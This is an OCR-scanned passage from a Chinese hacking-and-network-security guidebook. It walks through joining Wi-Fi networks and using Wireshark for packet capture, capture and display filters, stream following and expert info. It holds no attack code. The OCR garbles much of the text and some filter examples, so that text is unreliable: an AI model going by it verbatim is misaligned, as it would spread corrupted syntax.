在 打开 的 子 选 项 中 选中 “基本 信息 ”选项 ， We 
即 可 在 右 侧 的 窗 格 中 显示 无 线 设置 的 基本 
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[step 图 单 去 笔记 本 电脑 桌面 右 下 角 的 无 线 
连接 图 标 ， 在 打开 的 界面 中 显示 了 笔记 本 
电脑 自动 搜索 的 无 线 设备 和 信号 ， 如 下 图 
所 示 。 


[sep 国 单 击 一 个 无 线 连接 设备 ， 展 开 无 线 连 
接 功能 ， 在 其 中 选中 “自动 连接 ” 复 选 框 ， 
如 下 图 所 示 。 


[Step 加 单 击 “连接 ”按钮 ， 在 打开 的 界面 
中 输入 无 线 连接 设备 的 连接 密码 ， 如 下 图 
所 示 。 


人 后 mywifi 
硕 666666 


寺 ChinaNet-HSTF 


后 famiy 
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step 图 单 去 “下 一 步 ” 按 钮 ， 开 始 连接 网 络 ， 
如 下 图 所 示 。 


TP-UNK1 


所 mywifi 


step 较 连接 到 网 络 之 后 ， 桌 面 右 下 角 的 无 线 
连接 设备 显示 正常 ， 并 以 弧 线 的 方法 给 出 
信号 的 强 弱 ， 如 下 图 所 示 。 


[Eee 图 再 次 打开 “网 络 和 共享 中 心 ” 窗 口 ， 
在 其 中 可 以 看 到 这 台 笔 记 本 电脑 当前 的 连 
接 状态 ， 如 下 图 所 示 。 


第 网 相 和 兴 束 中心 = 几 ”% 


个 千 ” 网 站 和 -，， 网 始 和 共享 中 心 , i 
坦 看 其 本 网 络 信息 并 设置 连接 


于 看 洁 司 网 络 
TP-LINKT a ne 
人 本 
更 汶 网 络 认 轩 


se 


设 要 训 坝 、 反 或 VPN 连接 ; 或 设置 路 二 或 接 入 所 


司 Ju 
首相 晤 网 闪 辣 是， 或 得 是 淮 术 生 个。 


绝招 4: 将 手机 接 入 无 线 网 


无 线 局 域 网 配置 完成 后 ， 用 户 可 以 将 首 
手机 接 入 无 线 网 ， 从 而 实现 无 线 上 网 ， 手 
机 接 入 无 线 网 络 的 操作 步骤 如 下 。 

[step 图 在 手机 界面 中 点 按 “设置 ”图 标 ， 进 
入 手机 的 “设置 ”界面 ， 如 下 图 所 示 。 


2 Pia Cm 57% 


设置 


全 移动 网 络 
© wan x 浊 
© a 


其 他 连接 方式 


© 证 0 和 状态 栏 

©@ st 

@ 个 性 主题 

@ = 
[step 图 点 按 WLAN 右 侧 的 “已 关闭 ”， 开 启 
手机 WLAN 功能 ， 并 自动 搜索 周围 可 用 的 
WLAN， 如 下 图 所 示 。 


WLAN 


开启 WLAN . 


ChnaNet-H5TF 
TP-LINK1 
TP-LINK2 
TP-LINK_38F156 
TP-LINK_6666 
fhpre-H5TF 
mywifi 


© 


step 国 点 按 可 用 的 WLAN， 弹 出 连接 界面 ， 
在 其 中 输入 相应 的 密码 ， 如 下 图 所 示 。 


TP-UINK1 


国 问 
四 日 日 旧 四 口 加 日 
[alsole losslxl 


悦目 四 日 四 日 四 日 后 
BT-T EE 
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[sep 贺 点 按 “ 连 接 ” 按 钮 ， 即 可 将 手机 接 入 
WiFi， 并 在 下 方 显示 “已 连接 ”字样 ， 这 
样 手机 就 接 入 了 WiFi， 然 后 就 可 以 使 用 手 
机 进行 上 网 了 ， 如 下 图 所 示 。 


F4245 .52Kis 加 字 芒 首 中 国情 CE 50% 
WLAN 
开启 WLAN © 
TP-LINK1 


ChinaNet-H5TF 
TP-UINK2 
fhpre-H5TF 
mywi 


wanghua 


12.3 ”无 线 网 络 的 安全 分 析 


使 用 Wireshark (前 称 Ethereal) 可 以 
对 无 线 网 络 进行 安全 分 析 ， 该 软件 是 一 个 
网 络 封 包 分 析 软 件 ， 主 要 作用 功能 捕获 网 
络 封包 ， 并 尽 可 能 显示 出 最 为 详细 的 网 络 
封包 信息 ， 网 络 管理 员 使 用 Wireshark 可 以 
检测 当前 网 络 问题 。 

打开 Wireshark 抓 包 工具 ， 单 击 “ 应 用 
程序 ”下 拉 菜 单 ,从 中 选择 “09- 嗅 探 /欺骗 ” 
选项 ， 在 弹出 的 菜单 中 可 以 看 到 Wireshark 
图 标 ， 如 下 图 所 示 。 
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单 击 Wiresharkk 图 标 便 可 以 打开 
Wireshark 抓 包 软件 ,其 工作 界面 如 下 图 所 示 。 


如 果 已 经 进行 了 抓 包 操作 ， 当 打开 一 
个 数据 包 后 ， 其 工作 界面 如 下 图 所 示 。 


Wireshark 的 特点 是 简单 易 用 ， 通 过 简 

单 的 设置 便 可 以 开始 抓 包 ， 甚 至 只 需 选择 
一 个 网 卡 ， 单 击 “ 开 始 ” 按 钮 ， 便 可 以 实 
现 快 速 抓 包 。 


1. 开始 抓 包 


具体 的 操作 步骤 如 下 。 
step 国 打开 Wireshark 抓 包 工具 ， 在 界面 “ 捕 
获 ” 功 能 中 ， 可 以 对 捕获 数据 包 进 行 快速 
配置 ， 如 果 网 卡 中 产生 数据 ， 会 在 网 卡 的 
右 侧 显示 折线 图 ， 如 下 图 所 示 。 
捕获 
-使 用 这 个 过 滤器 : | 由 | Entera capture filter 
wlan0mon 
any 
Loopback lo 


wian0 
nflog 


| 车 
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[step 图 双击 选中 的 网 卡 ， 便 可 以 开始 抓 包 ， 

此 时 “开始 ”按钮 变 成 灰色 , “停止” 按 
钮 与 “ 重 置 ”按钮 可 用 ， 如 下 图 所 示 为 
Wireshark 工具 抓 取 的 数据 信息 。 


no 
"EA IAD WD 
pT 


SH 70. Dofiog OM) Fri Peto 


侈 提示 : 抓 包 一 旦 开始 ， 默 认 数 据 包 显示 
列表 会 动态 刷新 最 新 捕获 的 数据 。 单 击 “ 停 
止 ” 按 钮 可 以 停止 对 数据 包 的 捕获 ， 此 时 
状态 栏 会 显示 当前 捕获 的 数据 包 数 量 及 
大 小 。 


2. 数据 包 显示 列 


默认 情况 下 ，Wireshark 会 给 出 一 个 初 
始 数据 包 显 示 列 。 

主要 内 容 介 绍 如 下 。 

(1) No: 编号 ， 根 据 抓 取 的 数据 包 自 
动 分 配 。 

(2) Time: 时 间 ， 根 据 捕获 时 间 设 定 
该 列 。 

(3) Source: 源 地 址 信息 ， 如 果 数 据 包 
包含 源 地 址 信息 如下、Mac 等 ) ， 这 类 信 
息 会 显示 在 这 列 中 。 

(4) Destination: 目的 地 址 信息 ， 同 源 
地 址 信息 类 似 。 

(5) Protocol: 协议 信息 ， 捕 获 的 数据 
包 会 根据 不 同 的 协议 进行 标注 ， 这 列 显示 
具体 协议 类 型 。 

(6) Length: 长 度 信息 ， 标 注 出 该 数据 
包 的 长 度 信息 。 

(7) Inof: 信息 ，Wireshark 对 数据 包 
的 一 个 解读 。 


3. 修改 显示 列 


默认 的 显示 列 可 以 修改 ， 在 实际 数据 
分 析 中 ， 根 据 需 要 可 以 修改 显示 列 的 项 目 ， 
具体 的 操作 步骤 如 下 。 
Btep 图 选中 需要 加 入 显示 列 的 子 项 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “应 用 为 列 ” 菜 


邻 ， I 
令 ， 如 下 图 所 示 
| 
文件 虽 编辑 E 视 图 QV】 联 轩 (6) 持 5KC) 1 
i 展开 全 部 加) 
加 | 
a 回避 且 网 同 i 
~ Pe 」 外 用 为 列 
0067 二。 作 这 有 
122 84;12;41.699539298 sher| 。 次 备 辽 直 器 
123 84:12:41 796773892 ua 。 对 话 过 回 
124 04:12:41.708821624 Hua 
125 84:12:41 711347375 有 过 江 可 痢 色 
这 中 法 
Fa 
显示 分 想 字 调 - 
导出 分 给 字 节 注 [8) 
1161 Subt 3 ee 
a 过 施加 宇 自 提 老 
086 9999 9998 8969 = Duration: | 协议 首选 大 


step 贺 此 时 显示 列 中 会 加 入 新 列 ， 这 样 针 对 
特殊 协议 分 析 会 非常 有 帮助 ， 如 下 图 所 示 。 


io. Time 
121 04:12:;41.686209067 
122 04:12:41.699530208 
123 04:12:41.706773892 
124 94:12:41.798821624 
125 04:12:41.711347375 


~ Source Destinat on 
42:31:3c:e1:d0:69 Broadcast 
Shenzhen_2f: 7a:0.. BbkEduca_60:a4:2. 
Guangdon_d8:ec:9- 
Guangdon_d8:ec:9， 
Guangdon_d8:ec: 9. 


[step 国 用 户 还 可 以 删除 、 隐 藏 当前 列 ， 在 显 
示 列 标题 中 右 击 ， 在 弹出 的 快捷 菜单 中 可 
以 通过 选择 相应 的 菜单 命令 ， 来 删除 或 隐 
藏 列 ， 如 下 图 所 示 。 
编辑 列 
适应 内 容 


v No. 

v Time 

V Source 

Vv Destination 

Vi Protocol 

Vi Length 

Vv Type 

Vv Info 

删除 此 列 | 

[step 较 用 户 可 以 对 当前 列 信 息 进行 修改 ， 在 
显示 列 标题 中 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “编辑 列 ” 菜 单 命令 ， 即 可 进入 列 信 
息 编辑 模式 ， 这 时 可 以 对 当前 列 信息 进行 
修改 ， 如 下 图 所 示 。 
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ET a Cieza| 


4. 修改 显示 时 间 

默认 情况 下 ，Wireshark 给 出 的 时 间 信 
息 不 方便 阅读 ， 为 此 ，Wireshark 提供 了 多 
种 时 间 显 示 方 式 ， 用 户 可 以 根据 个 人 喜好 
进行 选择 ， 具 体 的 操作 步骤 如 下 。 
[step 图 单 去 “视图 ”菜单 ， 在 弹出 的 菜单 中 


选择 “时 间 显 示 格 式 ” 菜 单 命令 ， 如 下 图 
所 示 。 
时 间 显示 格式 (T) » 
解析 名 称 » 
缩放 CZ) » 


这 样 就 可 以 将 默认 时 间 信息 以 时 间 格 
式 显示 出 来 ， 修 改 后 的 时 间 如 下 图 所 示 ， 
这 样 更 加 符合 阅读 习惯 。 

ITime 

2618-16-16 694:12:41.541339119 

2018-10-10 94:12:41.543999096 


2618-16-16 94:12:41.569918794 
26918-10-16 64:12:41.578031296 


5. 名 字 解 析 


默认 情况 下 ，Wireshark 只 开启 了 MAC 
地 址 解析 ， 针 对 不 同 厂商 的 MAC 头 部 信息 
进行 解析 ， 这 样 方便 阅读 。 如 果 在 实际 中 
有 需要 ， 可 以 开启 解析 网 络 名 称 、 解 析 传 
输 层 名 称 ， 具 体 的 操作 步骤 如 下 。 
[ep 车 选择 “捕获 ”菜单 ， 在 弹出 的 菜单 中 
选择 “选项 ”菜单 命令 ， 如 下 图 所 示 。 


捕获 (C) 分析 (A) ”统计 (S$) ”电话 (Y) 


Bs 
| 曾 (S) Ls Ctrl+E 


一 停止 D) 
攻 重新 开始 (R) 


Ctrl+E 
Ctn+R 


step 国 在 打开 的 设置 界面 中 选择 “选项 ” 选 
项 卡 ， 如 下 图 所 示 ， 从 这 里 选中 相应 的 选 
项 解析 名 称 即 可 。 


215 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


输入 输出 ”选项 
显示 选项 解析 名 称 
V 实时 更 新 分 组 列表 V MAC 地 址 解析 
V 实时 捕获 时 自动 滚屏 解析 网 络 名 称 
解析 传输 层 名 称 


[sp 图 用 户 还 可 以 手动 修改 对 地 址 的 解析 
选中 需要 解析 的 地 址 段 ， 右 击 ， 在 弹出 的 
快捷 菜单 中 选择 “编辑 解析 的 名 称 ” 菜 单 
命令 ， 如 下 图 所 示 。 
人 业 1 mm 7 

= 标记 /取消 标记 分 组 (M) EE 
忽略 /取消 忽略 分 组 (I) 

设置 /取消 设置 时 间 参 考 

时 间 平移 .… 

分 组 注释 .… 


作为 过 沪 器 应 用 


Wireshark 会 给 出 地 址 解析 库存 放 的 
位 置 ， 然 后 选择 “统计 ”菜单 ， 在 弹出 的 
菜单 中 选择 “已 解析 的 地 址 ”菜单 命令 ， 
如 下 图 所 示 。 


统计 (S) ”电话 (Y) ”无线 (W) ”工具 (T) ”帮助 (H) 
捕获 文件 属性 Ctrl+Ak+Shift+C 


协议 分 级 (P) 

Conversations 3 
Endpoints 避 
分 组 长 度 

1/O 图 表 人 0) 


Service Response Time 上 


1 


Eee 国 打开 如 下 图 所 示 的 对 话 框 ， 里 面 存 
放 了 已 经 解析 的 地 址 信息 。 通 过 对 名 称 
的 解析 ， 对 于 数据 包 的 来 源 去 处 会 更 加 的 
清晰 明了 ， 所 以 名 称 解 析 是 一 个 非常 好 的 
功能 。 
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Wireshark- 解析 后 的 地 址 jtmp/wireshark_any_20181010054212_7Lns8apcapng 。 全 
站 在 /tnp/wireshark_any_29181916054212_7Ln58a.pcapng 中 找到 的 解析 后 的 地 址 | 
## 注释 
四 
# No entries. 
# Hosts 
# 167 entries 


229.181.111.188 wn.a. 


n.con 


118.189.31.42 pl.tedn.qq.com 


显示 -|| ©Cancel | vOK 


人 移 注 意 : 如 果 开 启 名 称 解析 可 能 会 对 性 
能 带 来 损耗 ， 同 时 地 址 解析 不 能 保证 全 部 
正确 。 如 果 数 据 流 比较 大 ， 建 议 不 开启 名 
称 解析 ， 在 对 抓 取 的 数据 包 处 理 时 再 进行 
处 理 。 


绝招 6: 首选 项 的 设置 
大 多 数 软件 都 会 提供 一 个 首选 项 设 四 

置 ， 该 设置 主要 用 于 配制 软件 的 整体 风格 ， 

Wireshark 也 提供 了 首选 项 设置 ， 进 行 首先 

项 设置 的 操作 步骤 如 下 。 

E 国 选择 “编辑 ”菜单 ， 在 弹出 的 菜单 中 

选择 “首选 项 ”菜单 命令 ， 如 下 图 所 示 。 


文件 (有 ”六 缠 (E) ， 视 加 (V) 跳 忽 (G) 捕 著 (C) ”分 析 (A) 统计 (5) ” 电 活 (Y) 无 线 (W) 工 


au 复制 , jl 屿 aaa 
加 [此 用 * 9 查找 分 姐 (月 … Col+F = 
Wo. 查找 下 一 个 (N) CultN 
可 江上 一 个 W) Cehe 33569573 
P37:16:16 
T_33:66:73 
T_33:68:73 


20 bytes (5) 
? leld: 8@xee (DsC 


172) 
ent 


1b 37 16 1c 


Ced+Shift+T 
分 旨 注 际 _ Curl+Alt+C d8 ba ce a8 
兴 有 分 引 注 丢 d7 41 97 92 


Configuration Profiles.. Curl+Shift+A 


[step 图 打开 “首选 项 ”对 话 框 , 如 下 图 所 示 。 
首次 打开 “首选 项 ”对 话 框 ， 在 默认 打 
开 的 界面 中 ， 用 户 可 以 进行 相关 选项 的 
设置 。 


Wireshark -首选 项 © 


汪 记 住 主 宣 ] 的 大 小 攻 位 寺 
ors 条 开 文件 关中 的 文件 
“最近 信用 的 文件 夫 
信件 EF 


Tr Cr Ez 

“首选 项 ”对 话 框 中 相关 参数 的 介绍 如 下 。 

e。 “ 记 住 主 窗口 的 大 小 及 位 置 ” 复 选 框 : 
选中 之 后 , 每 次 打开 都 将 是 固定 大 小 。 

e。 “打开 文件 夹 中 的 文件 ” 设置 默认 
打开 或 保存 文件 的 路 径 ， 如 果 经 常 
抓 取 数据 包 ， 建 议 设置 一 个 固定 的 
位 置 。 

e“ 显 示 最 多 ”: 显示 数据 包 条 目 ， 根 
据 实际 需要 进行 设置 即 可 。 

。 “确认 未 保存 的 捕获 文件 ”选中 没 
有 保存 的 文件 名 前 面 会 多 出 一 个 “*” 
号 ， 提 示 用 户 没有 保存 ， 一 般 建 议 
开启 。 

。“ 主 工具 栏 的 样式 ? 这 里 有 3 种 样式 ， 
即 只 有 图 标 、 只 有 文本 、 图 标 加 文本 ， 
根据 需要 选择 即 可 。 

e “语言 ”; 设置 语言 环境 ， 这 里 可 以 
选择 多 种 国家 语言 ， 如 果 英 文 较 好 
可 以 切换 成 英文 状态 。 

lstep 图 在 “首选 项 ”对 话 框 中 ， 选 择 
Columns 选项 , 然后 单 击 左 下 方 的 “+” 按 钮 ， 
可 以 添加 一 个 列 ， 单 击 “-” 按 钮 可 以 删除 
一 个 列 ， 如 下 图 所 示 。 


A Wiese 四 a 
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Step 加 选择 Font and Colors 选项 ， 在 打开 的 


界面 中 可 以 设置 软件 字体 大 小 以 及 默认 颜 
色 ， 如 下 图 所 示 。 


wr BE 


Example GIF query packets have junbo window sizes 9123456789 


= ET 


示例 荐 活动 这 定 项 目 及 目 


CD mn Em 


[Sep 图 选择 Layout 选项 ， 在 打开 的 界面 中 
可 以 设置 软件 显示 布局 ， 该 项 还 是 比较 重 


要 的 。 
显示 ， 


默认 情况 下 ， 软 件 选 择 的 是 分 3 横 
根据 个 人 喜好 可 以 选择 不 同 的 布局 


方式 进行 显示 ， 如 下 图 所 示 。 


图 


国 国 鸭 好 | 呀 


国 格 1 窗 格 2: 窗 格 2: 

分 组 列表 分 组 列表 分 组 列表 
分 组 详情 。 分 组 详情 分 组 详情 
分 组 字 节 流 分 组 节 节 流 分 组 字 节 流 
无 无 无 


Packet List settings: 
Show packet separator 


状态 栏 设置 : 


Show selected packet number 
显示 文件 加 载 时 间 
Restore Defaults 


绝招 7: 捕获 选项 的 设置 


捕获 选项 主要 针对 抓 取 数据 包 使 用 的 


网 卡 、 抓 包 前 的 过 滤 、 抓 包 大 小 、 抓 包 时 


长 等 进行 设置 ， 这 个 功能 在 抓 包 软件 中 也 
属于 非常 重要 的 一 个 设置 。 


二 


进行 捕获 选项 设置 


进行 捕获 选项 设置 的 具体 操作 步骤 


如 下 。 


Step 车 选择 “捕获 ”菜单 ， 在 弹出 的 菜单 中 


选择 “ 


选项 ”菜单 命令 ， 如 下 图 所 示 。 


2 


捕获 (GO 分析 (统计 (5) ”电话 (Y) 


前 开 始 (9) Ctrl+E 


图 停止 (D) Ctrl+E 
| 可 重新 开始 (R) Ctrl+R 
撞 获 过 沪 器 (月 … 
刷新 接口 列表 F5 
这 个 过 滤器 : 补 八 拥 沐 辽 深 站 “… 


[step 图 打开 “捕获 接口 ”对 话 框 ， 默 认 选 中 
“输入 ”选项 卡 ， 其 中 混杂 模式 为 选中 状态 ， 
该 项 需要 选中 ， 否 则 可 能 抓 取 不 到 数据 包 ， 
列表 中 列 出 网 卡 相 关 信息 ， 选 择 相应 的 网 
卡 可 以 抓 取 数据 包 ， 如 下 图 所 示 。 


Wireshark , 靖 本 全 吕 日 


地 En 全 和 


所 渤 吉 口 的 匀 获 浊 流 攻 : [ENET a cpture TI = Fe 


Brep ose | vAm 


[step 图 在 “捕获 接口 ?对 话 框 中 , 选择 “输出 ” 
选项 卡 ， 在 其 中 可 以 设置 文件 保存 的 路 径 、 
输出 格式 、 是 否 自动 创建 新 文件 等 ， 如 下 
图 所 示 。 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


选中 ， 选 中 后 可 以 指定 保存 规则 ， 有 3 种 
规则 可 供 选择 。 

(1) 根据 抓 包 文件 的 大 小 ， 达 到 规定 
大 小 保存 更 换 下 一 个 文件 ， 保 存 文件 大 小 
可 以 调整 。 例 如 ，1MB 保存 一 个 文件 。 

(2) 根据 时 间 长 度 判 断 ， 达 到 规定 
时 间 保 存 更 换 下 一 个 文件 。 例 如 ， 每 间隔 
lmin 存储 一 个 文件 。 

(3) 循环 模式 ， 只 使 用 两 个 数据 包 ， 

初始 时 会 创建 两 个 数据 包 ， 当 需要 第 三 数 
据 包 时 ， 不 创建 ， 蔡 换 第 一 个 数据 包 ， 依 
次 循环 。 
[sp 加 在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 选 
项 ”选项 卡 ， 在 其 中 可 以 设置 显示 选项 、 
解析 名 称 、 自 动 停止 捕获 等 参数 ， 如 下 图 
所 示 。 


Wireshark , 浦口 ? x 
输入 输出。 选项 
显示 选项 部 析 名 称 
回 郊 掩 新 分 组 列表 回 mac 地 址 解析 
回 郊 拓 并 白 动 浓 屏 口 解析 网 络 名 称 


口 在 实时 捕获 期 间 蝇 示 捕 铁 信息 。 。 口 ] 解析 传输 层 名 称 


自动 停止 搬移 ， 在 经 过 … 
ou 妆 分 组 
ok 引文 件 
于 字 节 
ol 站 秘 > 


属 Wireshark : 丧 厂 接口 ? x 
输入 输出。 选项 

捕获 到 永久 文件 

文件 : [oot ET 


往 出 格式， 图 pespne 〇 pesp 

回 自动 @ 键 新 文件 ， 经 过 … 
口 [ao 辣 9 
DC 加 EBRE 
Or 国人 

回 使 用 一 个 3 形 组 器 ,采用 区。 加 文件 


Be] 


默认 “自动 创建 新 文件 ” 复 选 框 未 被 
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侈 提示 : 这 里 的 自动 停止 捕获 规则 ， 相 当 
于 一 个 定时 器 的 作用 ， 当 符合 条 件 后 停止 
抓 包 ， 可 以 同 多 文件 保存 功能 配合 使 用 。 
例如 ， 设 置 每 1MB 保存 一 个 数据 包 ， 符 合 
10 个 文件 后 停止 抓 包 。 


2. 数据 包 的 过 滤 设置 

Wireshark 抓 包 过 滤 是 基于 Libpcap/ 
wincap 库 实现 的 ， 所 以 遵循 BPF (Berkeley 
Packet Filter) 语法 ， 其 中 包括 类 型 (Type)、 
方向 (Dir) 、 协 议 〈Proto) 、 逻 辑 运算 符 。 

e@ 类 型 : 如 host、net、port。 


e@ 方向 : 如 src、dst。 
e 协议 : 如 ether、ip、tcp、udp、http、 
fp 等 。 

e 逻辑 运算 : 如 && 与 、|| 或、! 非 。 

例如 ， 想 要 抓 取 源 地 址 位 192.168.0.100 
目的 地 端口 为 80 的 流量 ， 过 滤 语 句 为 src 
host 192.168.0.100 && dst port 80; 想 要 抓 
取 了 全 地 址 192.168.0.100 和 192.168.0.101 的 
流量 ， 过 滤 语 句 为 host 192.168.0.100 || host 
192.168.0.101; 想 要 抓 取 除 广播 外 的 所 有 包 ， 
过 滤 语 句 为 ! broadcast。 


3. 开始 捕获 数据 包 


(1) 过 滤 MAC 地 址 
过 滤 的 语法 格式 如 下 。 


ether host < 需要 过 滤 的 MAC 地 址 > 
ether src host <MAC 地 址 > 
ether dst host <MAC 地 址 > 


例如 ， 对 MAC 地 址 过 滤 ， 可 以 在 “所 
选择 接口 的 捕获 过 滤器 ”文本 框 中 输入 如 
下 图 所 示 的 语句 。 


V 在 所 有 接口 上 使 用 混杂 模式 
所 这 拉 报 口 的 拍 区 过 光路 ， 间 exher sre Tacd3360773 画 - 


@ 侈 提示 : 如 果 过 滤 字 段 输入 错误 ， 则 背景 
色 是 红色 ， 输 入 正确 则 是 绿色 。 

(2) 过 滤 了 他 地 址 

过 滤 的 语法 格式 如 下 。 


host < 需 过 滤 的 ITP 地 址 > 
src host <IP 地 址 > 
dst host <IP 地 址 > 


例如 ， 对 下 地 址 过 滤 ， 可 以 在 “所 选 
择 接 口 的 捕获 过 滤器 ”文本 框 中 输入 如 下 
图 所 示 的 语句 。 


久 在 所 有 接口 上 使 用 混杂 模式 
所 远 反 接口 的 拷 著 过 潜 器， REGEGSEIS23580009 画 


(3) 过 滤 端 口 
过 滤 的 语法 格式 如 下 。 


prot 80、! prot 80、dst port 80、src 
port 80 


例如 , 综合 过 滤 地 址 与 端口 , 可 以 在 “所 
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选择 接口 的 捕获 过 滤器 ”文本 框 中 输入 如 
下 图 所 示 的 语句 。 


V 在 所 有 接口 上 使用 湿 杀 醒 式 
所 远 择 接 口 的 接 获 过 这 器 [出 host 192168.0.100 &8 port 8080| -| 


侈 提 示 : 抓 包 过 小 一 旦 设置 后 将 只 抓 取 符 
合 规则 的 数据 包 ， 这 样 会 过 滤 掉 大 量 干扰 
数据 包 ， 从 而 提高 抓 包 数 据 的 准确 率 。 


4. 过 滤 数 据 包 
显示 过 滤器 与 抓 包 过 滤 类 似 ， 显 示 过 
滤器 是 在 已 经 抓 取 的 数据 包 中 去 过 滤 显示 

出 需要 的 数据 包 ， 在 快捷 方式 的 下 方 有 一 

个 可 以 输入 表达 式 的 地 方 ， 如 下 图 所 示 ， 

在 这 里 输入 相应 的 表达 式 即 可 进行 过 滤 。 

四 癌 刁 网 加 
显示 过 滤 的 语法 设置 规则 如 下 : 

e 比较 操作 符 : 一 (等 于 )、! = (不 
等 于 )、> (大于)、< (小 于 )、>= (大 
于 或 等 于 ) 、<= (小 于 或 等 于 ) 。 

e 逻辑 操作 : and (与 操作 ) 、or (或 
操作 )、xor( 异 或 操作 )、not( 非 
操作 ) 。 

e JIP 地址 : ip.addr、ip.src、ip.dst。 

e 端口 过 滤 : tcp.port、tcp.srcport、tcp. 
dstport、tcp.flat.syn、tcp.flag.ack。 

e 协议 过滤 : amp、ip、icmp、upd、 
tcp、bootp、dns 等 。 

例如 ， 想 要 过 滤 满足 以 下 条 件 的 数据 

其 中 ，IP 地 址 为 如 下 设置 : 


ip.addr == 192.168.1.1 

ip.src == 192.168.1.1 

ip-dst ==, 192.168.1;1 

ip.src == 192.168.1.100 and ip.dst 
== 58.106.127.80 


端口 为 如 下 设置 : 
tcp.port == 80 

tcp.srcport == 80 
tcp.dstport == 80 


Q 中 | 中 喇 


吕 


= 


从 


tcp.flag.syn == 1 


过 滤 协 议 如 下 : 
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arIp、tcp、udp、not http、mnot arp 

下 面 给 出 一 个 综合 过 滤 的 语句 ， 其 中 
第 选 了 下 地 址 为 192.0.2.1， 并 且 不 是 从 
TCP 协议 80、25 端口 发 出 的 包 ， 输 入 的 表 
达 式 如 下 图 所 示 。 


大 国 寺 @iN 凡 a. 

[padar == 192.0.21and nottcp port in {80 25) 

什么 情况 使 用 抓 包 过 滤 ? 什么 情况 使 
用 显示 过 滤 ? 

如 果实 际 网 络 数据 流量 比较 大 ， 并 且 
已 经 锁定 数据 包 类 型 可 以 使 用 抓 包 过 滤器 。 
一 般 如 果 没 有 特殊 需求 ， 建 议 使 用 整体 抓 
包 ， 然 后 再 进行 显示 过 滤 ， 保 证 一 个 真实 
的 网 络 环境 ， 根 据 需 要 再 进行 筛 分， 这 样 
分 析 数 据 包 效 果 会 更 好 。 


绝招 8: 分 析 捕 获 的 数据 包 


分 析 数 据 包 主要 包括 数据 追踪 与 专家 
信息 两 方面 内 容 ， 它 们 都 属于 “分 析 ” 菜 
单 下 的 功能 。 


1. 数据 追踪 


正常 通信 中 ，TCP、UDP、SSL 等 数据 
包 都 是 以 分 片 的 形 发 送 的 ， 如 果 在 整个 数 
据 包 中 分 片 查看 数据 包 不 便于 分 析 ， 使 用 数 
据 流 追踪 可 以 将 TCP、UDP、SSL 等 数据 流 
进行 重组 ， 以 一 个 完整 的 形式 呈现 出 来 。 

打开 流 追 踪 有 两 种 方式 : 

第 1 种 方式 : 在 数据 流 显示 列表 中 ， 
选择 需要 追踪 的 数据 流 ， 右 击 ， 在 弹出 的 
快捷 菜单 中 选择 “追踪 流 ” 菜 单 命令 ， 如 
下 图 所 示 。 


192.168.0.106 
Broadcast 


': Cse, ECN: Not 


38 68 45 98 

30 61 ce as 
54 58 2f 31 
41 43 48 45  - 
78 2d 6167 - 
54 68 75 2c 
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第 2 种 方式 : 选择“ 分 析 ” 菜 单 ， 在 
弹出 的 菜单 中 选择 “追踪 流 ” 菜 单 命令 ， 
如 下 图 所 示 。 


双亲 内” 统 :tH(S) 电 活 MW 天 0W) 工具。 帮助 H) 
Display Fiters.. 
时 过 泛 攻 去 (M).… 
应 用 为 列 
作为 过 淹 吕 应 用 
准 得 过 污 器 
对 活 过 浅 器 
解码 为 (入).… 
要 新 堪 入 Lua 活 件 Cul+Shift+L 


estination 


Cl+Shift+! 
» Broadcast 
39.255.255.256 


92.168.8.166 
roadcast 


TLs 流 S 
Trp 资 。 cul+Alt+shiftyH 


以 上 两 种 方式 都 可 以 打开 “追踪 流 ” 
界面 ， 如 下 图 所 示 ， 从 这 里 可 以 清晰 地 看 
到 这 个 协议 通信 的 完整 过 程 ， 其 中 红色 部 
分 为 发 送 请 求 ， 蓝 色 部 分 为 服务 器 返回 
结果 。 


Cl+Shif+E 


于 示 分 组 字 节 .… 
《专家 信息 


Cul+Shit+O 


Wireshark， 迁 中 TCP 条 tcpstream eq Oj tcppcapng eee 


Linux x86_64; rv:60.0) Gecko/29198191 Firefox/60.0| 


红色 部 分 


main 蓝 色 部 分 
15 Nay 2917 18:84;48 GMT 
4ce1444eb7d289963123” 


tybkh2loHZxSshTNPEIM8vqkqS4anAsA-- 
evalidate 


红色 部 分 


nux 86 64; rv:69.0) Gecko/20198101 Firefox/69.9| 
显示 和 保存 数据 为 ASCH -| 注 D ， 


二 找 严 琵 下 一 个 (| 


Bretp 六 科比 流 打印 || Sveas。 遂 加 || Close 


2. 专家 信息 

专家 信息 可 以 对 数据 包 中 特定 状态 进 
行 警告 说 明 ， 其 中 包括 错误 信息 (errors) 、 
警告 信息 (wamings) 、 注 意 信息 (notes) 
以 及 对 话 信息 (chats) 。 

查看 专家 信息 的 具体 操作 步骤 如 下 。 


[ma 国 选择“ 分析” 菜单， 在 弹出 的 菜单 中 
选择 “专家 信息 ”菜单 命令 ， 如 下 图 所 示 。 


分 析 (A】 统 it(S) 电话 M 无 三 W)， 工具 (T) 帮助 (H) 


下 一 


Display Filters... 
应 用 为 列 


bn 


Ctrl+Shift+1 


准备 过 沪 器 
| 和 
解码 为 (A)… 
LE 重新 载 入 Lua 插件 。 Ctrl+Shift+L 
1 scrp » | 
ij 过 风流 » 


Ctrl+Shift+E 


: Cse@, ECN: Not 


显示 分 组 字 节 … 


Ctrl+Shift+O | 
| 


[step 图 打开 “专家 信息 ”对 话 框 ， 如 下 图 所 
示 ， 其 中 错误 信息 会 以 红色 进行 标注 ， 警 
告 信 息 以 黄色 进行 标注 ， 注 意 信息 以 浅 蓝 
色 进 行 标注 ， 正 常 通信 以 深蓝 色 进 行 标注 。 
每 一 种 类 型 会 单独 列 出 一 行进 行 显示 ， 通 
过 专家 信息 可 以 更 直观 地 查看 数据 通信 中 
存在 哪些 问题 。 


So Sunray Cr [1 


Ria pe 
ET 
Be ee 


a 绝招 9: 统计 捕获 的 数据 包 


了 通过 对 数据 包 的 统计 分 析 ， 可 以 查看 
更 为 详细 的 数据 信息 ， 进 而 分 析 网 络 中 是 
否 存 在 安全 问题 。 查 看 数据 包 统计 信息 的 
操作 步骤 如 下 。 

[step 图 选择 “统计 ”菜单 ， 在 弹出 的 菜单 中 
选择 “捕获 文件 属性 ”菜单 命令 ， 打 开 “ 捕 
获 文件 属性 ”对 话 框 , 在 其 中 可 以 查看 文件 、 
